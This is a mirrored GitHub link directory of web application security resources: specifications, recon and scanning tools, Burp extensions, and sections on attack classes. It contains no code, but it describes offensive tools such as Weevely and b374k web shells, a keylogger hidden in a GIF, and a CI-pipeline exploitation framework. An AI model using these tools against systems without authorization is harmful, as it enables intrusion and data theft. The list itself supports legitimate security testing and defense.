Giters

cranelab / webapp-tech

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Web Application Technologies

Table of Contents

General

  • 101 ASVS
    • OWASP Top Ten Project
      • The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.
    • The Website Obesity Crisis
    • Video Testing stateful web application workflows - András Veres-Szentkirályi
    • Paper Testing stateful web application workflows - SANS - András Veres-Szentkirályi
      • Most web applications used for complex business operations and/or employing advanced GUI frameworks have stateful functionality. Certain workflows, for example, might require completing certain steps before a transaction is committed, or a request sent by a client-side UI element might need several preceding requests that all contribute to the session state. Most automated tools focus on a request and maybe a redirection, thus completely missing the point in these cases, where resending a request gets ignored by the target application. As a result, while these tools are getting better day by day, using them for testing such execution paths are usually out of the question. Since thorough assessment is cumbersome without such tools, there's progress, but we are far from plug-and-play products. This paper focuses on the capabilities of currently available solutions, demonstrating their pros and cons, along with opportunities for improvement.

Standards

Content Security Policy (CSP)

Cross-Origin Resource Sharing (CORS)

Document Object Model(DOM)

Hyper Text Markup Language HTML

Fetch

Hyper Text Transport Protocol (HTTP)

MIME Sniffing

  • 101
    • MIME Sniffing - whatwg.org
    • Media Type Sniffing | draft-ietf-websec-mime-sniff-03
      • Many web servers supply incorrect Content-Type header fields with their HTTP responses. In order to be compatible with these servers, user agents consider the content of HTTP responses as well as the Content-Type header fields when determining the effective media type of the response. This document describes an algorithm for determining the effective media type of HTTP responses that balances security and compatibility considerations
  • Articles/Blogposts/Presentations/Talks/Writeups

OAUTH

robots.txt

Same-Origin Policy

Security Assertion Markup Language (SAML)

Service Workers

  • 101
    • Service Worker - w3c
      • This specification describes a method that enables applications to take advantage of persistent background processing, including hooks to enable bootstrapping of web applications while offline. The core of this system is an event-driven Web Worker, which responds to events dispatched from documents and other sources. A system for managing installation, versions, and upgrades is provided. The service worker is a generic entry point for event-driven background processing in the Web Platform that is extensible by other specifications.

Subresource Integrity

Secure Sockets Layer/Transport Layer Security(SSL/TLS)

  • 101
  • Articles/Blogposts/Presentations/Talks/Writeups
  • Attacks Against
    • SSL/TLS Interception Proxies and Transitive Trust
      • Secure Sockets Layer (SSL) and its successor Transport Layer Security (TLS), have become key components of the modern Internet. The privacy, integrity, and authenticity provided by these protocols are critical to allowing sensitive communications to occur. Without these systems, e-commerce, online banking, and business-to-business exchange of information would likely be far less frequent. Threat actors have also recognized the benefits of transport security, and they are increasingly turning to SSL to hide their activities. Advanced Persistent Threat (APT ) attackers, botnets, and eve n commodity web attacks can leverage SSL encryption to evade detection. To counter these tactics, organizations are increasingly deploying security controls that intercept end-to-end encrypted channels. Web proxies, data loss prevention (DLP) systems, specialized threat detection solutions, and network intrusion prevention systems (NIPS) offer functionality to intercept, inspect, and filter encrypted traffic. Similar functionality is present in lawful intercept systems and solutions enabling the broad surveillance of encrypted communications by governments. Broadly classified as “SSL/TLS interception proxies”, these solutions act as a “man-in-the-middle", violating the end-to-end security promises of SSL. This type of interception comes at a cost. Intercepting SSL-encrypted connections sacrifices a degree of privacy and integrity for the benefit of content inspection, often at the risk of authenticity and endpoint validation. Implementers and designers of SSL interception proxies should consider these risks and understand how their systems operate in unusual circumstances

Streams

  • 101
    • Streams - Dec12 2019
      • This specification provides APIs for creating, composing, and consuming streams of data that map efficiently to low-level I/O primitives.

Uniform Resource Identifier/Locator(URIs/URLs)

Web Authentication

WebBluetooth

Web Hooks

WebNFC

WebRTC

WebSockets

WebUSB

  • 101
  • Articles/Blogposts/Presentations/Talks/Writeups
    • WebUSB - How a website could steal data off your phone
      • This blog post looks in to the capabilities of WebUSB to understand how it works, the new attack surface, and privacy issues. We will describe the processes necessary to get access to devices and how permissions are handled in the browser. Then we will discuss some security implications and shows, how a website can use WebUSB to establish an ADB connection and effectively compromise a connected Android phone.

Technologies

API Stuff

  • General
    • WebSocket API Standards
    • White House Web API Standards
      • This document provides guidelines and examples for White House Web APIs, encouraging consistency, maintainability, and best practices across applications. White House APIs aim to balance a truly RESTful API interface with a positive developer experience (DX).
    • Build Simple Restful Api With Python and Flask Part 1 - Mukhammad Ginanjar Azie
    • What Is OpenAPI?
    • The OpenAPI Specification
      • The OpenAPI Specification (OAS) defines a standard, programming language-agnostic interface description for REST APIs, which allows both humans and computers to discover and understand the capabilities of a service without requiring access to source code, additional documentation, or inspection of network traffic. When properly defined via OpenAPI, a consumer can understand and interact with the remote service with a minimal amount of implementation logic. Similar to what interface descriptions have done for lower-level programming, the OpenAPI Specification removes guesswork in calling a service.
    • The OpenAPI Specification
      • The OpenAPI Specification is a community-driven open specification within the OpenAPI Initiative, a Linux Foundation Collaborative Project. The OpenAPI Specification (OAS) defines a standard, programming language-agnostic interface description for REST APIs, which allows both humans and computers to discover and understand the capabilities of a service without requiring access to source code, additional documentation, or inspection of network traffic. When properly defined via OpenAPI, a consumer can understand and interact with the remote service with a minimal amount of implementation logic. Similar to what interface descriptions have done for lower-level programming, the OpenAPI Specification removes guesswork in calling a service.
  • Fuzzing
  • Building One
  • Securing
  • Tools
    • Postman - chrome plugin
    • restclient - Firefox addon
    • Astra
      • REST API penetration testing is complex due to continuous changes in existing APIs and newly added APIs. Astra can be used by security engineers or developers as an integral part of their process, so they can detect and patch vulnerabilities early during development cycle. Astra can automatically detect and test login & logout (Authentication API), so it's easy for anyone to integrate this into CICD pipeline. Astra can take API collection as an input so this can also be used for testing apis in standalone mode.
    • API-fuzzer
      • API Fuzzer which allows to fuzz request attributes using common pentesting techniques and lists vulnerabilities

Browser Security

Certificate Transparency

  • General
    • Abusing Certificate Transparency Or How To Hack Web Applications BEfore Installation - Hanno Bock
    • The Spy in the Sandbox – Practical Cache Attacks in Javascript
      • We present the first micro-architectural side-channel attack which runs entirely in the browser. In contrast to other works in this genre, this attack does not require the attacker to install any software on the victim’s machine to facilitate the attack, the victim needs only to browse to an untrusted webpage with attacker-controlled content. This makes the attack model highly scalable and extremely relevant and practical to today’s web, especially since most desktop browsers currently accessing the In- ternet are vulnerable to this attack. Our attack, which is an extension of the last-level cache attacks of Yarom et al., allows a remote adversary recover information belonging to other processes, other users and even other virtual machines running on the same physical host as the victim web browser. We describe the fundamentals behind our attack, evaluate its performance using a high bandwidth covert channel and finally use it to construct a system-wide mouse/network activity logger. Defending against this attack is possible, but the required counter- measures can exact an impractical cost on other benign uses of the web browser and of the computer.
  • Tools

Content Management Systems

  • Drupal
  • Joomla
    • Highly Effective Joomla Backdoor with Small Profile
    • JoomScan
      • Joomla! is probably the most widely-used CMS out there due to its flexibility, user-friendlinesss, extensibility to name a few.So, watching its vulnerabilities and adding such vulnerabilities as KB to Joomla scanner takes ongoing activity.It will help web developers and web masters to help identify possible security weaknesses on their deployed Joomla! sites. No web security scanner is dedicated only one CMS.
    • JScanner
      • Analyze target Joomla! installation using several different techniques.
    • JoomlaVS
      • JoomlaVS is a Ruby application that can help automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic finger printing and can scan for vulnerabilities in components, modules and templates as well as vulnerabilities that exist within Joomla itself.
  • Sharepoint
    • Sparty - Sharepoint/Frontpage Auditing Tool
      • Sparty is an open source tool written in python to audit web applications using sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.
  • Wordpress
    • WPScan
      • WPScan is a black box WordPress vulnerability scanner.
    • WPSeku
      • Wordpress Security Scanner

Continous Integration/Delivery/Build Systems

ColdFusion

Electron

Flash/SWF

JavaScript

Java Server Faces (JSF)

Java Server Pages (JSP)

JSON Web Tokens

MIME Sniffing

NodeJS

Platform Agnostic Security Token (PASETO)

PHP

REST/SOAP/Web Services(WSDL)

Ruby/Ruby on Rails

Web Assembly

Secure Sockets Layer / Transport Layer Security

Single Sign-On(SSO)

  • 101
  • Articles/Blogposts/Writeups
  • Talks & Presentations
  • Dupe Key Confusion
    • attack to bypass XML signature verification by sending multiple key identifiers in the KeyInfo section. Vulnerable systems will use the first one to verify the XML signature and the second one to verify the trust on the signing party. This plugin applies this technique to SAML tokens by allowing to modify and then resign the SAML assertion with an arbitrary attacker-controlled key which is then send as the first element of the KeyInfo section, while the original key identifier is sent as the second key identifier.
    • Tools
      • DupeKeyInjector
        • Dupe Key Injetctor is a Burp Suite extension implementing Dupe Key Confusion, a new XML signature bypass technique presented at BSides/BlackHat/DEFCON 2019 "SSO Wars: The Token Menace" presentation.
        • Slides
        • Paper

Web Application Firewalls(WAFs)

JS Frameworks

Web Proxies

  • 101
  • Articles/Blogposts/Writeups
  • Tools
    • Burpsuite
      • Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
    • ZAP - Zed Attack Proxy
      • The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
    • Paros - Web Proxy
      • A Java based HTTP/HTTPS proxy for assessing web application vulnerability. It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.
    • Mallory: Transparent TCP and UDP Proxy
      • Mallory is a transparent TCP and UDP proxy. It can be used to get at those hard to intercept network streams, assess those tricky mobile web applications, or maybe just pull a prank on your friend.
    • TCP Catcher
      • TcpCatcher is a free TCP, SOCKS, HTTP and HTTPS proxy monitor server software.
    • wssip
      • Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa.
    • ratproxy
      • Ratproxy is a semi-automated, largely passive web application security audit tool. It is meant to complement active crawlers and manual proxies more commonly used for this task, and is optimized specifically for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.

Web Servers

Tactics & Techniques

  • Attacking
  • Securing
  • Guides & Methodologies
  • Payloads
  • Tactics
  • General Reconnaissance Techniques
    • Insecure HTTP Header Removal
    • Backslash Powered Scanning: Hunting Unknown Vulnerability Classes
      • Existing web scanners search for server-side injection vulnerabilities by throwing a canned list of technology-specific payloads at a target and looking for signatures - almost like an anti-virus. In this document, I'll share the conception and development of an alternative approach, capable of finding and confirming both known and unknown classes of injection vulnerabilities. Evolved from classic manual techniques, this approach reaps many of the benefits of manual testing including casual WAF evasion, a tiny network footprint, and flexibility in the face of input filtering.
  • Attack Surface Reconaissance
    • Articles/Blogposts/Writeups
    • Tools
      • AttackSurfaceMapper
        • Attack Surface Mapper is a reconnaissance tool that uses a mixture of open source intellgence and active techniques to expand the attack surface of your target. You feed in a mixture of one or more domains, subdomains and IP addresses and it uses numerous techniques to find more targets. It enumerates subdomains with bruteforcing and passive lookups, Other IPs of the same network block owner, IPs that have multiple domain names pointing to them and so on. Once the target list is fully expanded it performs passive reconnaissance on them, taking screenshots of websites, generating visual maps, looking up credentials in public breaches, passive port scanning with Shodan and scraping employees from LinkedIn.
      • intrigue-core
        • Intrigue-core is a framework for external attack surface discovery and automated OSINT.
      • Domain Analyzer
        • Domain analyzer is a security analysis tool which automatically discovers and reports information about the given domain. Its main purpose is to analyze domains in an unattended way.
      • domain-profiler
        • domain-profiler is a tool that uses information from various sources (Whois, DNS, SSL, ASN) to determine what decisions have been made regarding a domain or list of domains.
      • The Hamburglar
        • Hamburglar -- collect useful information from urls, directories, and files
  • (Sub)Domain Reconnaissance
    • Articles/Blogposts/Writeups
    • Domain Discovery
      • DRROBOT
        • Dr.ROBOT is a tool for Domain Reconnaissance and Enumeration. By utilizing containers to reduce the overhead of dealing with dependencies, inconsistencies across operating systems, and different languages, Dr.ROBOT is built to be highly portable and configurable.
    • Subdomain Discovery Tools
      • Sudomy
        • Sudomy is a subdomain enumeration tool, created using a bash script, to analyze domains and collect subdomains in fast and comprehensive way.
      • domains-from-csp
        • A Python script to parse domain names from CSP header
      • pdlist. A passive subdomain finder
        • pdlist is a passive subdomain finder written in python3. This tool can be used effectively to collect information about a domain without ever sending a single packet to any of its hosts. Given a domain like "example.com" it will find all the hosts which have a hostname <something>.example.com or URLs strictly related to example.com.
  • Subdomain Takeover
  • Virtual Hosts
    • 101
    • Tools
      • virtual-host-discovery
        • This is a basic HTTP scanner that'll enumerate virtual hosts on a given IP address. During recon, this might help expand the target by detecting old or deprecated code. It may also reveal hidden hosts that are statically mapped in the developer's /etc/hosts file.
      • blacksheepwall
        • blacksheepwall is a hostname reconnaissance tool
      • VHostScan
        • A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.
  • Visual Reconnaissance
    • Articles/Blogposts/Writeups
    • Tools
      • PowerWebShot
        • A PowerShell tool for taking screenshots of multiple web servers quickly.
      • HTTrack - Website Copier
        • It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
      • Kraken
        • Kraken is a tool to help make your web interface testing workflow more efficient. This is done by using Django, Apache, and a MySql database to store and organize web interface screenshots and data. This allows you and your team to take notes and track which hosts have been tested simultaniously. Once you are finished, you can view these notes you took and generate reports in the Reports section.
      • Eyeballer
        • Eyeballer is meant for large-scope network penetration tests where you need to find "interesting" targets from a huge set of web-based hosts. Go ahead and use your favorite screenshotting tool like normal (EyeWitness or GoWitness) and then run them through Eyeballer to tell you what's likely to contain vulnerabilities, and what isn't.
      • gowitness
        • gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line. Both Linux and macOS is supported, with Windows support 'partially working'.
      • webscreenshot
        • A simple script to screenshot a list of websites, based on the url-to-image PhantomJS script.
      • LazyShot
        • The simplest way to take an automated screenshot of given URLs. Easy installation!
      • RAWR - Rapid Assessment of Web Resources
    • 3rd Party Hosted Tools
      • VisualSiteMapper
        • Visual Site Mapper is a free service that can quickly show a map of your site.
  • Recon
    • HTTPLeaks
      • HTTPLeaks - All possible ways, a website can leak HTTP requests
    • General
      • hackability
        • Rendering Engine Hackability Probe performs a variety of tests to discover what the unknown rendering engine supports. To use it simply extract it to your web server and visit the url in the rendering engine you want to test. The more successful probes you get the more likely the target engine is vulnerable to attack.
    • Content/Folder Discovery
      • Tachyon
        • Tachyon is a Fast Multi-Threaded Web Discovery Tool
      • dirsearch
        • dirsearch is a simple command line tool designed to brute force directories and files in websites.
      • LinkFinder
        • LinkFinder is a python script written to discover endpoints and their parameters in JavaScript files. This way penetration testers and bug hunters are able to gather new, hidden endpoints on the websites they are testing. Resulting in new testing ground, possibility containing new vulnerabilities. It does so by using jsbeautifier for python in combination with a fairly large regular expression.
    • JS-based scanning
      • lan-js
        • Probe LAN devices from a web browser.
      • sonar.js
        • A Framework for Scanning and Exploiting Internal Hosts With a Webpage
    • Web Page
      • HTCAP
        • htcap is a web application scanner able to crawl single page application (SPA) in a recursive manner by intercepting ajax calls and DOM changes
      • gethead
        • HTTP Header Analysis Vulnerability Tool
    • Web Server
      • WhatWeb
      • httprecon - Advanced Web Server Fingerprinting
        • The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis. Besides the discussion of different approaches and the documentation of gathered results also an implementation for automated analysis is provided. This software shall improve the easyness and efficiency of this kind of enumeration. Traditional approaches as like banner-grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting. Some of them were already discussed in the book Die Kunst des Penetration Testing (Chapter 9.3, HTTP-Fingerprinting, pp. 530-550).
  • HTTP Enumeration
    • Articles/Blogposts/Writeups
    • Tools
      • Arjun
        • HTTP parameter discovery suite.
      • Psi-Probe
        • Advanced manager and monitor for Apache Tomcat, forked from Lambda Probe
      • HTTPie - curl for humans
        • HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.
  • Enpdoint Discovery
    • Articles/Blogposts/Writeups
    • Tools
      • LinkFinder
        • A python script that finds endpoints in JavaScript files
      • LinkFinder
        • A python script that finds endpoints in JavaScript files
      • JSParser
        • A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests when performing security research or bug bounty hunting.
  • Forced-Browsing
  • Site/Technology Identification
    • WhatWeb
      • WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1500 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
    • CMSExplorer
      • CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running. Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the "explore" option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module's current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp, Paros, Webinspect, etc.
    • BlindElephant Web Application Fingerprinter
      • The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.
    • Fingerprinter
      • CMS/LMS/Library etc Versions Fingerprinter. This script's goal is to try to find the version of the remote application/third party script etc by using a fingerprinting approach.
    • Web Filter External Enumeration Tool (WebFEET)
      • WebFEET is a web application for the drive-by enumeration of web security proxies and policies. See associated white paper (Drive-by enumeration of web filtering solutions)
    • Fingerprinter
      • This script goal is to try to find the version of the remote application/third party script etc by using a fingerprinting approach.
  • Vulnerability Scanner
    • Nikto
    • Spaghetti - Web Application Security Scanner
      • Spaghetti is an Open Source web application scanner, it is designed to find various default and insecure files, configurations, and misconfigurations. Spaghetti is built on python2.7 and can run on any platform which has a Python environment.
    • skipfish
      • Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.
    • wikto
      • Wikto is Nikto for Windows - but with a couple of fancy extra features including Fuzzy logic error code checking, a back-end miner, Google assisted directory mining and real time HTTP request/response monitoring. Wikto is coded in C# and requires the .NET framework.
    • WATOBO
      • WATABO is a security tool for testing web applications. It is intended to enable security professionals to perform efficient (semi-automated) web application security audits.
    • YASUO
      • Yasuo is a ruby script that scans for vulnerable 3rd-party web applications.
    • ParrotNG
      • ParrotNG is a tool capable of identifying Adobe Flex applications (SWF) vulnerable to CVE-2011-2461
    • Arachni Web Scanner
      • Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.
    • Pyfiscan
      • Pyfiscan is free web-application vulnerability and version scanner and can be used to locate out-dated versions of common web-applications in Linux-servers. Example use case is hosting-providers keeping eye on their users installations to keep up with security-updates. Fingerprints are easy to create and modify as user can write those in YAML-syntax. Pyfiscan also contains tool to create email alerts using templates.
  • autochrome
    • This tool downloads, installs, and configures a shiny new copy of Chromium.
    • Article

Different Types of Attacks

Abuse of Functionality

  • jsgifkeylogger
    • a javascript keylogger included in a gif file This is a PoC

Brute Force/Fuzzing

  • Dirbuster
    • DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.
  • Go Buster
    • Directory/file busting tool written in Go
    • Recursive, CLI-based, no java runtime
  • WFuzz
    • Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc
  • dirsearch
    • dirsearch is a simple command line tool designed to brute force directories and files in websites.
  • Tachyon * Tachyon is a Fast Multi-Threaded Web Discovery Tool
  • Syntribos
    • Given a simple configuration file and an example HTTP request, syntribos can replace any API URL, URL parameter, HTTP header and request body field with a given set of strings. Syntribos iterates through each position in the request automatically. Syntribos aims to automatically detect common security defects such as SQL injection, LDAP injection, buffer overflow, etc. In addition, syntribos can be used to help identify new security defects by automated fuzzing.

Attacking Continous Integration Systems

  • cider - Continuous Integration and Deployment Exploiter
    • CIDER is a framework written in node js that aims to harness the functions necessary for exploiting Continuous Integration (CI) systems and their related infrastructure and build chain (eg. Travis-CI, Drone, Circle-CI). Most of the exploits in CIDER exploit CI build systems through open GitHub repositories via malicious Pull Requests. It is built modularly to encourage contributions, so more exploits, attack surfaces, and build chain services will be integrated in the future.
  • Rotten Apple
    • A tool for testing continuous integration (CI) or continuous delivery (CD) system security
  • Exploiting Continuous Integration (CI) and Automated Build Systems - spaceb0x

CSV Injection

Clickjacking

Cross Protocol Scripting/Request Attack

  • 101
  • Articles/Blogposts/Writeups
  • Papers
    • HTML Form Protocol Attack - Jochen Topf(2001)
      • This paper describes how some HTML browsers can be tricked through the use of HTML forms into sending more or less arbitrary data to any TCP port. This can be used to send commands to servers using ASCII based protocols like SMTP, NNTP, POP3, IMAP, IRC, and others. By sending HTML email to unsuspecting users or using a trojan HTML page, an attacker might be able to send mail or post Usenet News through servers normally not accessible to him. In special cases an attacker might be able to do other harm, e.g. deleting mail from a POP3 mailbox.
  • Presentations/Talks/Videos
  • Tools
    • Extract data
      • Extract data is a demo combining a cross-protocol request attack with DNS rebinding

Cross Site Content Hijacking

Cross Site History Manipulation

  • 101
  • Articles/Blogposts/Writeups
  • Papers
  • Presentations/Talks/Videos
  • Tools

Cross Site Request Forgery (CSRF)

Cascading StyleSheets Injection

Cross Site WebSocket Hijacking

De/Encoders

Data Structure Attacks

Embedded Malicious Code

  • 101
  • Articles/Blogposts/Writeups
  • Papers
  • Presentations/Talks/Videos
  • Tools

Exploitation of Authentication

  • 101
  • Articles/Blogposts/Writeups
  • Papers
  • Presentations/Talks/Videos
  • Tools

Insecure Direct Object Reference

Execution After(/Open) Redirect (EAR)

File Upload Testing

HTTP Request Smuggling

* Image-based Exploitation AKA Exploiting Polyglot features of File standards

Injection Based Attacks

OS Command Injection

JNDI Attack Class

(De-)Serialization Attacks

HTML Smuggling

LFI & RFI

(No)SQL Injection

Path Traversal Attacks

Prototype Pollution Attack

Reflected File Download

Relative Path Overwrite

Server Side Request Forgery (SSRF)

Server Side Include

Server Side Template Injection

Typosquatting

Web Shells

  • Articles
  • Detection
    • Case Study: How Backdoors Bypass Security Solutions with Advanced Camouflage Techniques
      • Look at PHP obfuscation methods for webshells
    • NeoPI
      • What is NeoPI? NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. The intended purpose of NeoPI is to aid in the detection of hidden web shell code. The development focus of NeoPI was creating a tool that could be used in conjunction with other established detection methods such as Linux Malware Detect or traditional signature/keyword based searches.
    • Shell Detector
      • Shell Detector – is a application that helps you find and identify php/cgi(perl)/asp/aspx shells. Shell Detector has a “web shells” signature database that helps to identify “web shell” up to 99%.
    • Loki - Simple IOC Scanner
      • Scanner for Simple Indicators of Compromise
  • Tools
    • Weevely
      • Weevely is a command line web shell dinamically extended over the network at runtime used for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments. The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper in the internal networks.
      • Getting Started
    • b374k shell 3.2
      • This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser
    • Simple websockets based webshell
    • JSShell
      • An interactive multi-user web based JS shell written in Python with Flask (for server side) and of course Javascript and HTML (client side). It was initially created to debug remote esoteric browsers during tests and research. I'm aware of other purposes this tool might serve, use it at your own responsibility and risk.
    • htshells
      • Self contained web shells and other attacks via .htaccess files.
    • Encoding Web Shells in PNG IDAT chunks - idontplaydarts.com

XSS

Cross-Site History Manipulation

Scraping

  • 101
  • Articles/Papers/Talks/Writeups
  • General
  • Tools
    • Puppeteer
      • Puppeteer is a Node library which provides a high-level API to control Chrome or Chromium over the DevTools Protocol. Puppeteer runs headless by default, but can be configured to run full (non-headless) Chrome or Chromium.
    • dvcs-ripper
      • Rip web accessible (distributed) version control systems: SVN, GIT, Mercurial/hg, bzr, ... It can rip repositories even when directory browsing is turned off.
    • Scrapy
      • An open source and collaborative framework for extracting the data you need from websites.
  • Miscellaneous
    • WeasyPrint
      • WeasyPrint is a visual rendering engine for HTML and CSS that can export to PDF. It aims to support web standards for printing. WeasyPrint is free software made available under a BSD license. BeautifulSoup

Tabnabbing Attacks

Timing-based Attacks/Data race Attacks

  • 101
  • Articles/Blogposts/Writeups
  • Papers
    • Race Detection for Web Applications - Boris Petrov, Martin Vechev, Manu Sridharan, Julian Dolby
      • We present the first formulation of a happens-before relation for common web platform features. Developing this relation was a non-trivial task, due to complex feature interactions and browser differences. We also present a logical memory access model for web applications that abstracts away browser implementation details. Based on the above, we implemented WEBRACER, the first dynamic race detector for web applications. WEBRACER is implemented atop the production-quality WebKit engine, enabling testing of full-featured web sites. WEBRACER can also simulate certain user actions, exposing more races. We evaluated WEBRACER by testing a large set of Fortune 100 company web sites. We discovered many harmful races, and also gained insights into how developers handle asynchrony in practice.
  • Tools
    • Requests-Racer
      • Requests-Racer is a small Python library that lets you use the Requests library to submit multiple requests that will be processed by their destination servers at approximately the same time, even if the requests have different destinations or have payloads of different sizes. This can be helpful for detecting and exploiting race condition vulnerabilities in web applications. (For more information, see motivation.md.)
    • Race the Web
      • Tests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) simultaneously, and then compares the responses from the server for uniqueness. Includes a number of configuration options.
    • timing_attack
      • Perform timing attacks against web applications
    • Race condition exploit
      • Tool to help with the exploitation of web application race conditions
  • Miscellaneous

TLS Redirection (and Virtual Host Confusion)

Web Cache Deception Attack

XML

Miscellaneous

  • unindexed
    • The site is constantly searching for itself in Google, over and over and over, 24 hours a day. The instant it finds itself in Google search results, the site will instantaneously and irrevocably securely delete itself. Visitors can contribute to the public content of the site, these contributions will also be destroyed when the site deletes itself.

COWL: A Confinement System for the Web * Robust JavaScript confinement system for modern web browsers. COWL introduces label-based mandatory access control to browsing contexts (pages, iframes, etc.) in a way that is fully backward-compatible with legacy web content. * Paper

Burp Stuff/Plugins

  • Tutorials/Tips/Stuff
  • Plugins
    • Adapting Burp Extensions for Tailored Pentesting
    • AuthMatrix
      • AuthMatrix is a Burp Suite extension that provides a simple way to test authorization in web applications and web services.
    • Autorize
      • Autorize is an automatic authorization enforcement detection extension for Burp Suite. It was written in Python by Barak Tawily, an application security expert, and Federico Dotta, a security expert at Mediaservice.net. Autorize was designed to help security testers by performing automatic authorization tests. With the last release now Autorize also perform automatic authentication tests.
      • Escalating Privileges like a Pro - Gaurav Narwani
    • backslash-powered-scanner
      • This extension complements Burp's active scanner by using a novel approach capable of finding and confirming both known and unknown classes of server-side injection vulnerabilities. Evolved from classic manual techniques, this approach reaps many of the benefits of manual testing including casual WAF evasion, a tiny network footprint, and flexibility in the face of input filtering.
    • burp-rest-api
      • A REST/JSON API to the Burp Suite security tool. Upon successfully building the project, an executable JAR file is created with the Burp Suite Professional JAR bundled in it. When the JAR is launched, it provides a REST/JSON endpoint to access the Scanner, Spider, Proxy and other features of the Burp Suite Professional security tool.
    • BurpSmartBuster
      • Looks for files, directories and file extensions based on current requests received by Burp Suite
    • BurpKit
      • BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. It also provides a bi-directional Script bridge API which allows users to create quick one-off BurpSuite plugin prototypes which can interact directly with the DOM and Burp's extender API.
    • BurpSmartBuster
      • A Burp Suite content discovery plugin that add the smart into the Buster!
    • collaborator-everywhere
      • A Burp Suite Pro extension which augments your proxy traffic by injecting non-invasive headers designed to reveal backend systems by causing pingbacks to Burp Collaborator
    • C02
      • Co2 includes several useful enhancements bundled into a single Java-based Burp Extension. The extension has it's own configuration tab with multiple sub-tabs (for each Co2 module). Modules that interact with other Burp tools can be disabled from within the Co2 configuration tab, so there is no need to disable the entire extension when using just part of the functionality.
    • distribute-damage
      • Designed to make Burp evenly distribute load across multiple scanner targets, this extension introduces a per-host throttle, and a context menu to trigger scans from. It may also come in useful for avoiding detection.
    • HUNT
      • HUNT is a Burp Suite extension to: 1. Identify common parameters vulnerable to certain vulnerability classes; 2. Organize testing methodologies inside of Burp Suite;
    • HUNT Burp Suite Extension
      • HUNT Logo HUNT is a Burp Suite extension to: 1. Identify common parameters vulnerable to certain vulnerability classes. 2. Organize testing methodologies inside of Burp Suite.
    • IntruderPayloads
    • Office Open XML Editor - burp extension
    • ParrotNG - burp plugin
    • PwnBack
      • Burp Extender plugin that generates a sitemap of a website using Wayback Machine
    • SAML Raider
      • SAML Raider is a Burp Suite extension for testing SAML infrastructures. It contains two core functionalities: Manipulating SAML Messages and manage X.509 certificates.
    • swurg
